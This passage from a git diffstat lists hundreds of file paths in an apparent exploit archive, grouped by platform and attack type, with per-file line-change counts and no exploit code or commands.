2 +- exploits/multiple/dos/39877.txt | 2 +- exploits/multiple/dos/39906.txt | 2 +- exploits/multiple/dos/40031.txt | 2 +- exploits/multiple/dos/40032.txt | 2 +- exploits/multiple/dos/40034.txt | 2 +- exploits/multiple/dos/40035.txt | 2 +- exploits/multiple/dos/40036.txt | 2 +- exploits/multiple/dos/40037.txt | 2 +- exploits/multiple/dos/40087.txt | 2 +- exploits/multiple/dos/40088.txt | 2 +- exploits/multiple/dos/40089.txt | 2 +- exploits/multiple/dos/40090.txt | 2 +- exploits/multiple/dos/40095.txt | 2 +- exploits/multiple/dos/40096.txt | 2 +- exploits/multiple/dos/40097.txt | 2 +- exploits/multiple/dos/40098.txt | 2 +- exploits/multiple/dos/40099.txt | 2 +- exploits/multiple/dos/40100.txt | 2 +- exploits/multiple/dos/40101.txt | 2 +- exploits/multiple/dos/40102.txt | 2 +- exploits/multiple/dos/40103.txt | 2 +- exploits/multiple/dos/40104.txt | 2 +- exploits/multiple/dos/40105.txt | 2 +- exploits/multiple/dos/40194.txt | 2 +- exploits/multiple/dos/40195.txt | 2 +- exploits/multiple/dos/40197.txt | 2 +- exploits/multiple/dos/40198.txt | 2 +- exploits/multiple/dos/40199.txt | 2 +- exploits/multiple/dos/40238.txt | 2 +- exploits/multiple/dos/40307.txt | 2 +- exploits/multiple/dos/40308.txt | 2 +- exploits/multiple/dos/40309.txt | 2 +- exploits/multiple/dos/40310.txt | 2 +- exploits/multiple/dos/40311.txt | 2 +- exploits/multiple/dos/40355.txt | 2 +- exploits/multiple/dos/40356.txt | 2 +- exploits/multiple/dos/40405.txt | 2 +- exploits/multiple/dos/40420.txt | 2 +- exploits/multiple/dos/40421.txt | 2 +- exploits/multiple/dos/40510.txt | 2 +- exploits/multiple/dos/40654.txt | 2 +- exploits/multiple/dos/40955.txt | 2 +- exploits/multiple/dos/41008.txt | 2 +- exploits/multiple/dos/41012.txt | 2 +- exploits/multiple/dos/41163.txt | 2 +- exploits/multiple/dos/41420.txt | 2 +- exploits/multiple/dos/41421.txt | 2 +- exploits/multiple/dos/41422.txt | 2 +- exploits/multiple/dos/41423.txt | 2 +- exploits/multiple/dos/41608.txt | 2 +- exploits/multiple/dos/41609.txt | 2 +- exploits/multiple/dos/41610.txt | 2 +- exploits/multiple/dos/41611.txt | 2 +- exploits/multiple/dos/41612.txt | 2 +- exploits/multiple/dos/41668.txt | 2 +- exploits/multiple/dos/41669.txt | 2 +- exploits/multiple/dos/41905.txt | 2 +- exploits/multiple/dos/42017.txt | 2 +- exploits/multiple/dos/42018.txt | 2 +- exploits/multiple/dos/42019.txt | 2 +- exploits/multiple/dos/42049.txt | 2 +- exploits/multiple/dos/42050.txt | 2 +- exploits/multiple/dos/42051.txt | 2 +- exploits/multiple/dos/42052.txt | 2 +- exploits/multiple/dos/42123.txt | 2 +- exploits/multiple/dos/42124.txt | 2 +- exploits/multiple/dos/42245.txt | 2 +- exploits/multiple/dos/42247.txt | 2 +- exploits/multiple/dos/42248.txt | 2 +- exploits/multiple/dos/42249.txt | 2 +- exploits/multiple/dos/42286.txt | 2 +- exploits/multiple/dos/42781.txt | 2 +- exploits/multiple/dos/42782.txt | 2 +- exploits/multiple/dos/42783.txt | 2 +- exploits/multiple/dos/43233.txt | 2 +- exploits/multiple/dos/43320.txt | 2 +- exploits/multiple/dos/43325.txt | 2 +- exploits/multiple/dos/44082.txt | 2 +- exploits/multiple/dos/44083.txt | 2 +- exploits/multiple/dos/44247.txt | 2 +- exploits/multiple/dos/44427.txt | 2 +- exploits/multiple/dos/44491.txt | 2 +- exploits/multiple/dos/44526.txt | 2 +- exploits/multiple/dos/44527.txt | 2 +- exploits/multiple/dos/44528.txt | 2 +- exploits/multiple/dos/44529.txt | 2 +- exploits/multiple/dos/44849.txt | 2 +- exploits/multiple/dos/44862.txt | 2 +- exploits/multiple/dos/44863.txt | 2 +- exploits/multiple/dos/45032.txt | 2 +- exploits/multiple/dos/45059.txt | 2 +- exploits/multiple/dos/45098.txt | 2 +- exploits/multiple/dos/45121.txt | 2 +- exploits/multiple/dos/45122.txt | 2 +- exploits/multiple/dos/45123.txt | 2 +- exploits/multiple/dos/45443.txt | 2 +- exploits/multiple/dos/45444.txt | 2 +- exploits/multiple/dos/4601.txt | 2 +- exploits/multiple/dos/5229.txt | 2 +- exploits/multiple/dos/6029.txt | 2 +- exploits/multiple/dos/6174.txt | 2 +- exploits/multiple/dos/6237.txt | 2 +- exploits/multiple/dos/6252.txt | 2 +- exploits/multiple/dos/6622.txt | 2 +- exploits/multiple/dos/8285.txt | 2 +- exploits/multiple/dos/8826.txt | 2 +- exploits/multiple/dos/9731.txt | 2 +- exploits/multiple/local/10207.txt | 2 +- exploits/multiple/local/10326.txt | 2 +- exploits/multiple/local/19547.txt | 2 +- exploits/multiple/local/21117.txt | 2 +- exploits/multiple/local/28817.txt | 2 +- exploits/multiple/local/30039.txt | 4 +- exploits/multiple/local/30970.txt | 2 +- exploits/multiple/local/32055.txt | 2 +- exploits/multiple/local/32501.txt | 2 +- exploits/multiple/local/39595.txt | 2 +- exploits/multiple/local/40931.txt | 2 +- exploits/multiple/local/41021.md | 2 +- exploits/multiple/local/41870.txt | 2 +- exploits/multiple/local/41904.txt | 2 +- exploits/multiple/local/42407.txt | 2 +- exploits/multiple/local/43887.txt | 2 +- exploits/multiple/remote/13787.txt | 2 +- exploits/multiple/remote/1791.patch | 2 +- exploits/multiple/remote/1799.txt | 4 +- exploits/multiple/remote/18245.py | 2 +- exploits/multiple/remote/18619.txt | 2 +- exploits/multiple/remote/18763.txt | 2 +- exploits/multiple/remote/19093.txt | 2 +- exploits/multiple/remote/19451.txt | 2 +- exploits/multiple/remote/19459.txt | 2 +- exploits/multiple/remote/19749.txt | 2 +- exploits/multiple/remote/20139.txt | 2 +- exploits/multiple/remote/20140.txt | 2 +- exploits/multiple/remote/20181.txt | 2 +- exploits/multiple/remote/20259.txt | 2 +- exploits/multiple/remote/20685.txt | 2 +- exploits/multiple/remote/20738.txt | 2 +- exploits/multiple/remote/20881.txt | 2 +- exploits/multiple/remote/20889.txt | 2 +- exploits/multiple/remote/20891.txt | 2 +- exploits/multiple/remote/21027.txt | 2 +- exploits/multiple/remote/22029.txt | 8 +- exploits/multiple/remote/22509.txt | 2 +- exploits/multiple/remote/23439.txt | 2 +- exploits/multiple/remote/23707.txt | 2 +- exploits/multiple/remote/24032.txt | 2 +- exploits/multiple/remote/24979.txt | 2 +- exploits/multiple/remote/24980.txt | 2 +- exploits/multiple/remote/24981.txt | 2 +- exploits/multiple/remote/24982.txt | 2 +- exploits/multiple/remote/24983.txt | 2 +- exploits/multiple/remote/24984.txt | 2 +- exploits/multiple/remote/24995.txt | 2 +- exploits/multiple/remote/25011.txt | 2 +- exploits/multiple/remote/25018.txt | 2 +- exploits/multiple/remote/25019.txt | 4 +- exploits/multiple/remote/25028.txt | 2 +- exploits/multiple/remote/25079.txt | 2 +- exploits/multiple/remote/25091.txt | 4 +- exploits/multiple/remote/25132.txt | 2 +- exploits/multiple/remote/25190.txt | 2 +- exploits/multiple/remote/25191.txt | 2 +- exploits/multiple/remote/25205.txt | 2 +- exploits/multiple/remote/25291.txt | 2 +- exploits/multiple/remote/25574.txt | 4 +- exploits/multiple/remote/25691.txt | 4 +- exploits/multiple/remote/25708.txt | 2 +- exploits/multiple/remote/25710.txt | 2 +- exploits/multiple/remote/26210.txt | 2 +- exploits/multiple/remote/28344.txt | 2 +- exploits/multiple/remote/28368.txt | 2 +- exploits/multiple/remote/30288.txt | 2 +- exploits/multiple/remote/30499.txt | 2 +- exploits/multiple/remote/30507.txt | 2 +- exploits/multiple/remote/30508.txt | 2 +- exploits/multiple/remote/30521.txt | 4 +- exploits/multiple/remote/30523.txt | 2 +- exploits/multiple/remote/30643.txt | 2 +- exploits/multiple/remote/30850.txt | 2 +- exploits/multiple/remote/30944.txt | 2 +- exploits/multiple/remote/31106.txt | 2 +- exploits/multiple/remote/31119.txt | 2 +- exploits/multiple/remote/31918.txt | 2 +- exploits/multiple/remote/32363.txt | 2 +- exploits/multiple/remote/32945.txt | 2 +- exploits/multiple/remote/33067.txt | 2 +- exploits/multiple/remote/33084.txt | 2 +- exploits/multiple/remote/33786.txt | 2 +- exploits/multiple/remote/33802.txt | 2 +- exploits/multiple/remote/33847.txt | 2 +- exploits/multiple/remote/34271.txt | 2 +- exploits/multiple/remote/349.txt | 2 +- exploits/multiple/remote/35062.txt | 2 +- exploits/multiple/remote/35495.txt | 2 +- exploits/multiple/remote/37336.txt | 2 +- exploits/multiple/remote/37851.txt | 2 +- exploits/multiple/remote/39631.txt | 2 +- exploits/multiple/remote/40382.txt | 4 +- exploits/multiple/remote/41740.txt | 2 +- exploits/multiple/remote/43665.md | 2 +- exploits/multiple/remote/44584.txt | 2 +- exploits/multiple/remote/45272.txt | 2 +- exploits/multiple/remote/4877.txt | 2 +- exploits/multiple/remote/5790.txt | 2 +- exploits/multiple/remote/6236.txt | 2 +- exploits/multiple/webapps/10209.txt | 2 +- exploits/multiple/webapps/11184.txt | 2 +- exploits/multiple/webapps/11186.txt | 2 +- exploits/multiple/webapps/11187.txt | 2 +- exploits/multiple/webapps/11211.txt | 2 +- exploits/multiple/webapps/14001.txt | 2 +- exploits/multiple/webapps/14004.txt | 2 +- exploits/multiple/webapps/17393.txt | 2 +- exploits/multiple/webapps/38706.txt | 2 +- exploits/multiple/webapps/42066.txt | 2 +- exploits/netbsd_x86/remote/21364.txt | 2 +- exploits/netware/remote/19364.txt | 2 +- exploits/novell/dos/31710.txt | 2 +- exploits/osx/dos/17567.txt | 2 +- exploits/osx/dos/27714.txt | 6 +- exploits/osx/dos/27715.txt | 2 +- exploits/osx/dos/27790.txt | 2 +- exploits/osx/dos/28521.txt | 2 +- exploits/osx/dos/29144.txt | 2 +- exploits/osx/dos/29161.txt | 2 +- exploits/osx/dos/29441.txt | 2 +- exploits/osx/dos/29452.txt | 2 +- exploits/osx/dos/29454.txt | 2 +- exploits/osx/dos/29509.txt | 2 +- exploits/osx/dos/29535.txt | 2 +- exploits/osx/dos/29620.txt | 4 +- exploits/osx/dos/38264.txt | 2 +- exploits/osx/dos/39357.txt | 2 +- exploits/osx/dos/39839.txt | 2 +- exploits/osx/dos/44238.c | 2 +- exploits/osx/local/19437.txt | 2 +- exploits/osx/local/19438.txt | 2 +- exploits/osx/local/19439.txt | 2 +- exploits/osx/local/21070.txt | 2 +- exploits/osx/local/21076.txt | 2 +- exploits/osx/local/29190.txt | 2 +- exploits/osx/local/30096.txt | 2 +- exploits/osx/local/3181.rb | 2 +- exploits/osx/local/37825.txt | 2 +- exploits/osx/local/38136.txt | 2 +- exploits/osx/local/38137.txt | 2 +- exploits/osx/local/38138.txt | 2 +- exploits/osx/local/39741.txt | 2 +- exploits/osx/local/3985.txt | 2 +- exploits/osx/local/4013.txt | 2 +- exploits/osx/local/40653.txt | 2 +- exploits/osx/local/44239.md | 2 +- exploits/osx/remote/21596.txt | 2 +- exploits/osx/remote/25598.txt | 4 +- exploits/osx/remote/28643.txt | 2 +- exploits/osx/remote/29448.txt | 2 +- exploits/osx/remote/8753.txt | 2 +- exploits/palm_os/local/20241.txt | 4 +- exploits/palm_os/local/20505.txt | 2 +- exploits/php/dos/14678.txt | 2 +- exploits/php/dos/18296.txt | 2 +- exploits/php/dos/24855.txt | 2 +- exploits/php/dos/33677.txt | 2 +- exploits/php/dos/35358.txt | 2 +- exploits/php/dos/44768.txt | 2 +- exploits/php/remote/32618.txt | 2 +- exploits/php/remote/39742.txt | 2 +- exploits/php/webapps/12338.txt | 2 +- exploits/php/webapps/12339.txt | 2 +- exploits/php/webapps/12617.txt | 2 +- exploits/php/webapps/13776.txt | 2 +- exploits/php/webapps/13777.txt | 2 +- exploits/php/webapps/13778.txt | 2 +- exploits/php/webapps/14160.txt | 2 +- exploits/php/webapps/17309.txt | 2 +- exploits/php/webapps/22089.txt | 2 +- exploits/php/webapps/22090.txt | 2 +- exploits/php/webapps/22473.txt | 2 +- exploits/php/webapps/24480.txt | 2 +- exploits/php/webapps/26111.txt | 2 +- exploits/php/webapps/27450.txt | 2 +- exploits/php/webapps/28896.txt | 2 +- exploits/php/webapps/30877.txt | 2 +- exploits/php/webapps/31678.txt | 2 +- exploits/php/webapps/33195.txt | 2 +- exploits/php/webapps/40209.py | 2 +- exploits/php/webapps/4059.txt | 2 +- exploits/php/webapps/40637.txt | 2 +- exploits/php/webapps/42615.txt | 2 +- exploits/php/webapps/45445.txt | 14 +++ exploits/php/webapps/45447.txt | 15 +++ exploits/php/webapps/45449.txt | 28 +++++ exploits/php/webapps/45451.pl | 54 +++++++++ exploits/php/webapps/45452.txt | 16 +++ exploits/php/webapps/45456.txt | 16 +++ exploits/php/webapps/4841.txt | 2 +- exploits/php/webapps/697.c | 2 +- exploits/php/webapps/7421.txt | 2 +- exploits/php/webapps/897.cpp | 2 +- exploits/solaris/dos/28911.txt | 2 +- exploits/solaris/local/23874.txt | 2 +- exploits/solaris/remote/21097.txt | 2 +- exploits/solaris/remote/5282.txt | 2 +- exploits/unix/dos/20376.txt | 2 +- exploits/unix/local/19904.txt | 2 +- exploits/unix/remote/19722.txt | 2 +- exploits/unix/remote/20512.txt | 2 +- exploits/unix/remote/20879.txt | 2 +- exploits/unix/remote/21314.txt | 2 +- exploits/unix/remote/21574.txt | 2 +- exploits/unix/remote/21579.txt | 2 +- exploits/unix/remote/22085.txt | 2 +- exploits/unix/remote/22469.c | 2 +- exploits/unix/remote/22471.txt | 2 +- exploits/unix/remote/24067.c | 2 +- exploits/unix/remote/27992.txt | 2 +- exploits/unix/remote/32811.txt | 2 +- exploits/unix/remote/40347.txt | 2 +- exploits/windows/dos/10204.txt | 2 +- exploits/windows/dos/10208.txt | 2 +- exploits/windows/dos/10343.txt | 4 +- exploits/windows/dos/11062.txt | 2 +- exploits/windows/dos/11064.txt | 2 +- exploits/windows/dos/11176.txt | 2 +- exploits/windows/dos/11182.txt | 2 +- exploits/windows/dos/11192.txt | 2 +- exploits/windows/dos/11245.txt | 2 +- exploits/windows/dos/11247.txt | 2 +- exploits/windows/dos/11342.txt | 2 +- exploits/windows/dos/11632.txt | 2 +- exploits/windows/dos/11639.txt | 2 +- exploits/windows/dos/11803.txt | 2 +- exploits/windows/dos/12080.txt | 2 +- exploits/windows/dos/13872.txt | 2 +- exploits/windows/dos/13959.c | 2 +- exploits/windows/dos/14286.txt | 2 +- exploits/windows/dos/14346.txt | 2 +- exploits/windows/dos/14414.txt | 2 +- exploits/windows/dos/14424.txt | 2 +- exploits/windows/dos/14642.txt | 2 +- exploits/windows/dos/14767.txt | 2 +- exploits/windows/dos/14882.txt | 2 +- exploits/windows/dos/14883.txt | 2 +- exploits/windows/dos/14949.py | 2 +- exploits/windows/dos/14971.py | 2 +- exploits/windows/dos/14974.txt | 2 +- exploits/windows/dos/14992.py | 2 +- exploits/windows/dos/15019.txt | 2 +- exploits/windows/dos/15027.py | 2 +- exploits/windows/dos/15034.txt | 2 +- exploits/windows/dos/15065.txt | 2 +- exploits/windows/dos/15076.py | 2 +- exploits/windows/dos/15088.txt | 2 +- exploits/windows/dos/15096.py | 2 +- exploits/windows/dos/15104.py | 2 +- exploits/windows/dos/15148.txt | 2 +- exploits/windows/dos/15158.py | 2 +- exploits/windows/dos/15248.txt | 2 +- exploits/windows/dos/15259.txt | 2 +- exploits/windows/dos/15260.txt | 2 +- exploits/windows/dos/15407.txt | 2 +- exploits/windows/dos/15419.txt | 2 +- exploits/windows/dos/15426.txt | 2 +- exploits/windows/dos/15444.txt | 2 +- exploits/windows/dos/15514.txt | 2 +- exploits/windows/dos/15581.txt | 2 +- exploits/windows/dos/15698.html | 2 +- exploits/windows/dos/15992.txt | 2 +- exploits/windows/dos/1615.txt | 2 +- exploits/windows/dos/16254.txt | 2 +- exploits/windows/dos/17019.txt | 2 +- exploits/windows/dos/17023.txt | 30 ++--- exploits/windows/dos/17025.txt | 18 +-- exploits/windows/dos/1708.txt | 2 +- exploits/windows/dos/17159.txt | 2 +- exploits/windows/dos/17160.txt | 2 +- exploits/windows/dos/17161.txt | 2 +- exploits/windows/dos/17162.txt | 2 +- exploits/windows/dos/17163.txt | 2 +- exploits/windows/dos/17164.txt | 2 +- exploits/windows/dos/17274.txt | 2 +- exploits/windows/dos/17287.mid | 2 +- exploits/windows/dos/17398.txt | 2 +- exploits/windows/dos/17399.txt | 2 +- exploits/windows/dos/17405.txt | 2 +- exploits/windows/dos/17497.txt | 2 +- exploits/windows/dos/17544.txt | 2 +- exploits/windows/dos/17712.txt | 2 +- exploits/windows/dos/17772.txt | 2 +- exploits/windows/dos/1781.txt | 2 +- exploits/windows/dos/1782.txt | 2 +- exploits/windows/dos/1783.txt | 2 +- exploits/windows/dos/17830.txt | 2 +- exploits/windows/dos/17835.txt | 2 +- exploits/windows/dos/17836.txt | 2 +- exploits/windows/dos/17837.txt | 2 +- exploits/windows/dos/17838.txt | 2 +- exploits/windows/dos/17839.txt | 2 +- exploits/windows/dos/1784.txt | 2 +- exploits/windows/dos/17841.txt | 2 +- exploits/windows/dos/17842.txt | 6 +- exploits/windows/dos/17843.txt | 2 +- exploits/windows/dos/17844.txt | 4 +- exploits/windows/dos/17878.txt | 2 +- exploits/windows/dos/17879.txt | 2 +- exploits/windows/dos/17885.txt | 4 +- exploits/windows/dos/17889.txt | 2 +- exploits/windows/dos/17896.txt | 2 +- exploits/windows/dos/17903.txt | 2 +- exploits/windows/dos/17918.txt | 2 +- exploits/windows/dos/1792.txt | 2 +- exploits/windows/dos/17929.txt | 2 +- exploits/windows/dos/17930.txt | 2 +- exploits/windows/dos/17931.txt | 2 +- exploits/windows/dos/17963.txt | 4 +- exploits/windows/dos/17964.txt | 2 +- exploits/windows/dos/17965.txt | 2 +- exploits/windows/dos/17978.txt | 2 +- exploits/windows/dos/18049.txt | 2 +- exploits/windows/dos/18078.txt | 2 +- exploits/windows/dos/18112.txt | 2 +- exploits/windows/dos/18165.txt | 2 +- exploits/windows/dos/18166.txt | 4 +- exploits/windows/dos/18256.txt | 2 +- exploits/windows/dos/18257.txt | 2 +- exploits/windows/dos/18488.txt | 2 +- exploits/windows/dos/18489.txt | 2 +- exploits/windows/dos/18490.txt | 2 +- exploits/windows/dos/18491.txt | 2 +- exploits/windows/dos/18512.txt | 2 +- exploits/windows/dos/18586.txt | 2 +- exploits/windows/dos/18602.txt | 2 +- exploits/windows/dos/18606.txt | 2 +- exploits/windows/dos/18633.txt | 2 +- exploits/windows/dos/18739.txt | 2 +- exploits/windows/dos/18765.txt | 2 +- exploits/windows/dos/18771.txt | 2 +- exploits/windows/dos/18774.txt | 2 +- exploits/windows/dos/18776.txt | 2 +- exploits/windows/dos/18864.txt | 2 +- exploits/windows/dos/18878.txt | 2 +- exploits/windows/dos/18894.txt | 2 +- exploits/windows/dos/18952.txt | 2 +- exploits/windows/dos/18964.txt | 2 +- exploits/windows/dos/18972.txt | 2 +- exploits/windows/dos/19089.txt | 2 +- exploits/windows/dos/19181.txt | 2 +- exploits/windows/dos/19182.txt | 2 +- exploits/windows/dos/19183.txt | 2 +- exploits/windows/dos/19289.txt | 2 +- exploits/windows/dos/19331.txt | 2 +- exploits/windows/dos/19332.txt | 2 +- exploits/windows/dos/19333.txt | 2 +- exploits/windows/dos/19334.txt | 2 +- exploits/windows/dos/19335.txt | 2 +- exploits/windows/dos/19336.txt | 2 +- exploits/windows/dos/19337.txt | 2 +- exploits/windows/dos/19338.txt | 2 +- exploits/windows/dos/19385.txt | 2 +- exploits/windows/dos/19409.txt | 2 +- exploits/windows/dos/19445.txt | 2 +- exploits/windows/dos/19456.txt | 2 +- exploits/windows/dos/19483.txt | 2 +- exploits/windows/dos/19578.txt | 2 +- exploits/windows/dos/19619.txt | 4 +- exploits/windows/dos/19624.txt | 4 +- exploits/windows/dos/19636.txt | 6 +- exploits/windows/dos/19639.txt | 4 +- exploits/windows/dos/19664.txt | 2 +- exploits/windows/dos/19711.txt | 4 +- exploits/windows/dos/19725.txt | 2 +- exploits/windows/dos/19755.txt | 4 +- exploits/windows/dos/19760.txt | 4 +- exploits/windows/dos/19807.txt | 6 +- exploits/windows/dos/19810.txt | 4 +- exploits/windows/dos/19827.txt | 4 +- exploits/windows/dos/19856.txt | 4 +- exploits/windows/dos/19907.txt | 4 +- exploits/windows/dos/19960.txt | 2 +- exploits/windows/dos/19961.txt | 2 +- exploits/windows/dos/19962.txt | 2 +- exploits/windows/dos/20219.txt | 2 +- exploits/windows/dos/20254.txt | 2 +- exploits/windows/dos/20255.txt | 2 +- exploits/windows/dos/20783.txt | 2 +- exploits/windows/dos/20828.txt | 2 +- exploits/windows/dos/20834.txt | 2 +- exploits/windows/dos/20946.txt | 2 +- exploits/windows/dos/20971.txt | 2 +- exploits/windows/dos/21006.txt | 2 +- exploits/windows/dos/21040.txt | 2 +- exploits/windows/dos/21047.txt | 2 +- exploits/windows/dos/21123.txt | 2 +- exploits/windows/dos/21240.txt | 2 +- exploits/windows/dos/21389.txt | 2 +- exploits/windows/dos/21419.txt | 4 +- exploits/windows/dos/21612.txt | 2 +- exploits/windows/dos/21645.txt | 2 +- exploits/windows/dos/21741.txt | 2 +- exploits/windows/dos/21747.txt | 2 +- exploits/windows/dos/21789.txt | 2 +- exploits/windows/dos/21909.txt | 2 +- exploits/windows/dos/21953.txt | 2 +- exploits/windows/dos/21954.txt | 2 +- exploits/windows/dos/22132.txt | 2 +- exploits/windows/dos/22215.txt | 2 +- exploits/windows/dos/22239.txt | 2 +- exploits/windows/dos/22310.txt | 2 +- exploits/windows/dos/22330.txt | 2 +- exploits/windows/dos/22395.txt | 2 +- exploits/windows/dos/22402.txt | 2 +- exploits/windows/dos/22420.txt | 2 +- exploits/windows/dos/22464.txt | 2 +- exploits/windows/dos/22591.txt | 2 +- exploits/windows/dos/22655.txt | 2 +- exploits/windows/dos/22679.txt | 2 +- exploits/windows/dos/22680.txt | 2 +- exploits/windows/dos/22681.txt | 2 +- exploits/windows/dos/22850.txt | 2 +- exploits/windows/dos/22855.txt | 2 +- exploits/windows/dos/22878.txt | 4 +- exploits/windows/dos/22899.txt | 2 +- exploits/windows/dos/23107.txt | 2 +- exploits/windows/dos/23201.txt | 2 +- exploits/windows/dos/23246.txt | 2 +- exploits/windows/dos/23288.txt | 2 +- exploits/windows/dos/23469.txt | 2 +- exploits/windows/dos/23496.txt | 2 +- exploits/windows/dos/23686.txt | 2 +- exploits/windows/dos/23846.txt | 2 +- exploits/windows/dos/24178.txt | 2 +- exploits/windows/dos/24463.txt | 2 +- exploits/windows/dos/24586.txt | 2 +- exploits/windows/dos/24708.txt | 2 +- exploits/windows/dos/24726.txt | 2 +- exploits/windows/dos/24743.txt | 2 +- exploits/windows/dos/24962.txt | 2 +- exploits/windows/dos/25007.txt | 2 +- exploits/windows/dos/25140.txt | 2 +- exploits/windows/dos/25255.txt | 2 +- exploits/windows/dos/25680.txt | 2 +- exploits/windows/dos/25699.txt | 2 +- exploits/windows/dos/25737.txt | 2 +- exploits/windows/dos/25991.txt | 2 +- exploits/windows/dos/25992.txt | 4 +- exploits/windows/dos/26457.txt | 2 +- exploits/windows/dos/26869.txt | 4 +- exploits/windows/dos/27047.txt | 2 +- exploits/windows/dos/27049.txt | 2 +- exploits/windows/dos/27050.txt | 2 +- exploits/windows/dos/27051.txt | 2 +- exploits/windows/dos/27055.txt | 4 +- exploits/windows/dos/27069.txt | 2 +- exploits/windows/dos/27476.txt | 2 +- exploits/windows/dos/27745.txt | 2 +- exploits/windows/dos/27850.txt | 2 +- exploits/windows/dos/27971.txt | 2 +- exploits/windows/dos/28050.txt | 2 +- exploits/windows/dos/28087.txt | 2 +- exploits/windows/dos/28222.txt | 2 +- exploits/windows/dos/28227.txt | 2 +- exploits/windows/dos/28343.txt | 2 +- exploits/windows/dos/28381.txt | 2 +- exploits/windows/dos/28469.txt | 2 +- exploits/windows/dos/28588.txt | 2 +- exploits/windows/dos/28880.txt | 2 +- exploits/windows/dos/28894.txt | 2 +- exploits/windows/dos/29148.txt | 2 +- exploits/windows/dos/29172.txt | 2 +- exploits/windows/dos/2922.txt | 2 +- exploits/windows/dos/29285.txt | 2 +- exploits/windows/dos/29286.txt | 2 +- exploits/windows/dos/29287.txt | 2 +- exploits/windows/dos/29660.txt | 2 +- exploits/windows/dos/29664.txt | 2 +- exploits/windows/dos/29707.txt | 2 +- exploits/windows/dos/29738.txt | 2 +- exploits/windows/dos/29743.txt | 2 +- exploits/windows/dos/30160.txt | 2 +- exploits/windows/dos/30208.txt | 2 +- exploits/windows/dos/30255.txt | 2 +- exploits/windows/dos/30462.py | 4 +- exploits/windows/dos/30500.txt | 2 +- exploits/windows/dos/30512.txt | 2 +- exploits/windows/dos/30544.txt | 2 +- exploits/windows/dos/30590.txt | 2 +- exploits/windows/dos/30619.txt | 2 +- exploits/windows/dos/30672.txt | 2 +- exploits/windows/dos/30934.txt | 2 +- exploits/windows/dos/31122.txt | 2 +- exploits/windows/dos/312.txt | 2 +- exploits/windows/dos/31300.txt | 2 +- exploits/windows/dos/31301.txt | 2 +- exploits/windows/dos/31310.txt | 2 +- exploits/windows/dos/31330.txt | 2 +- exploits/windows/dos/31338.txt | 2 +- exploits/windows/dos/31360.txt | 4 +- exploits/windows/dos/31361.txt | 2 +- exploits/windows/dos/31363.txt | 2 +- exploits/windows/dos/31381.txt | 2 +- exploits/windows/dos/31399.txt | 2 +- exploits/windows/dos/31461.txt | 2 +- exploits/windows/dos/31563.txt | 2 +- exploits/windows/dos/31629.txt | 2 +- exploits/windows/dos/31696.txt | 2 +- exploits/windows/dos/31707.txt | 2 +- exploits/windows/dos/31899.txt | 2 +- exploits/windows/dos/31934.txt | 8 +- exploits/windows/dos/32573.txt | 2 +- exploits/windows/dos/32939.txt | 2 +- exploits/windows/dos/33056.pl | 2 +- exploits/windows/dos/33707.txt | 2 +- exploits/windows/dos/33710.txt | 2 +- exploits/windows/dos/33711.txt | 2 +- exploits/windows/dos/33770.txt | 2 +- exploits/windows/dos/33849.txt | 2 +- exploits/windows/dos/33977.txt | 2 +- exploits/windows/dos/3399.txt | 2 +- exploits/windows/dos/34093.txt | 2 +- exploits/windows/dos/34151.txt | 2 +- exploits/windows/dos/34158.txt | 2 +- exploits/windows/dos/3419.txt | 2 +- exploits/windows/dos/34227.txt | 2 +- exploits/windows/dos/34251.txt | 2 +- exploits/windows/dos/34355.txt | 2 +- exploits/windows/dos/34698.txt | 2 +- exploits/windows/dos/35217.txt | 2 +- exploits/windows/dos/35804.txt | 2 +- exploits/windows/dos/35873.txt | 2 +- exploits/windows/dos/35895.txt | 2 +- exploits/windows/dos/36128.txt | 2 +- exploits/windows/dos/36211.txt | 2 +- exploits/windows/dos/36334.txt | 2 +- exploits/windows/dos/36335.txt | 2 +- exploits/windows/dos/36336.txt | 2 +- exploits/windows/dos/36405.txt | 2 +- exploits/windows/dos/36443.txt | 2 +- exploits/windows/dos/36788.txt | 2 +- exploits/windows/dos/3690.txt | 2 +- exploits/windows/dos/3693.txt | 2 +- exploits/windows/dos/37346.txt | 2 +- exploits/windows/dos/37347.txt | 2 +- exploits/windows/dos/37348.txt | 2 +- exploits/windows/dos/37843.txt | 2 +- exploits/windows/dos/37844.txt | 2 +- exploits/windows/dos/37845.txt | 2 +- exploits/windows/dos/37846.txt | 2 +- exploits/windows/dos/37847.txt | 2 +- exploits/windows/dos/37848.txt | 2 +- exploits/windows/dos/37849.txt | 2 +- exploits/windows/dos/37853.txt | 2 +- exploits/windows/dos/37854.txt | 2 +- exploits/windows/dos/37856.txt | 2 +- exploits/windows/dos/37857.txt | 2 +- exploits/windows/dos/37858.txt | 2 +- exploits/windows/dos/37860.txt | 2 +- exploits/windows/dos/37861.txt | 2 +- exploits/windows/dos/37862.txt | 2 +- exploits/windows/dos/37875.txt | 2 +- exploits/windows/dos/37883.txt | 2 +- exploits/windows/dos/37884.txt | 2 +- exploits/windows/dos/37909.txt | 2 +- exploits/windows/dos/37910.txt | 2 +- exploits/windows/dos/37911.txt | 2 +- exploits/windows/dos/37912.txt | 2 +- exploits/windows/dos/37913.txt | 2 +- exploits/windows/dos/37914.txt | 2 +- exploits/windows/dos/37915.txt | 2 +- exploits/windows/dos/37916.txt | 2 +- exploits/windows/dos/37917.txt | 2 +- exploits/windows/dos/37918.txt | 2 +- exploits/windows/dos/37919.txt | 2 +- exploits/windows/dos/37920.txt | 2 +- exploits/windows/dos/37921.txt | 2 +- exploits/windows/dos/37922.txt | 2 +- exploits/windows/dos/37923.txt | 2 +- exploits/windows/dos/37924.txt | 2 +- exploits/windows/dos/37966.txt | 2 +- exploits/windows/dos/37967.txt | 2 +- exploits/windows/dos/38214.txt | 2 +- exploits/windows/dos/38215.txt | 2 +- exploits/windows/dos/38216.txt | 2 +- exploits/windows/dos/38217.txt | 2 +- exploits/windows/dos/38272.txt | 2 +- exploits/windows/dos/38281.txt | 2 +- exploits/windows/dos/38282.txt | 2 +- exploits/windows/dos/38283.txt | 2 +- exploits/windows/dos/38284.txt | 2 +- exploits/windows/dos/38285.txt | 2 +- exploits/windows/dos/38286.txt | 2 +- exploits/windows/dos/38288.txt | 2 +- exploits/windows/dos/38344.txt | 2 +- exploits/windows/dos/38348.txt | 2 +- exploits/windows/dos/38485.py | 2 +- exploits/windows/dos/38580.txt | 2 +- exploits/windows/dos/38701.txt | 2 +- exploits/windows/dos/38702.txt | 2 +- exploits/windows/dos/38703.txt | 2 +- exploits/windows/dos/38713.txt | 2 +- exploits/windows/dos/38714.txt | 2 +- exploits/windows/dos/38735.txt | 2 +- exploits/windows/dos/38736.txt | 2 +- exploits/windows/dos/38787.txt | 2 +- 